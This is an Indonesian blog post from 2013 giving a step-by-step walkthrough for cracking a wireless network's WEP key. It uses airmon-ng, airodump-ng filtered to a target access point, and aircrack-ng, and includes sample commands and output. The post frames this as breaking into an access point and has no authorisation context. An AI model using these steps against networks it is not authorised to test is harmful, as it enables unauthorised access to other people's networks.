Kamis, 29 Agustus 2013

Menjebol WEP Menggunakan Airodump dan Aircrack

Yang perlu diingat ada tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2

Untuk memudahkan operasi ada baiknya melakukan di shell
 
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1
 
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
 
airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut
 
Interface Chipset  Driver
wlan0  Intel 3945ABG iwl3945 - [phy0]
    (monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
 
airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
 
airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..

Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.
Jalankan aircrack untuk mengcrack WEP
 
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs 

misalnya
 
# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs 
# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs 

Bisa juga menggunakan perintah
 
# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs 

Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP

Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.



Tidak ada komentar:

Posting Komentar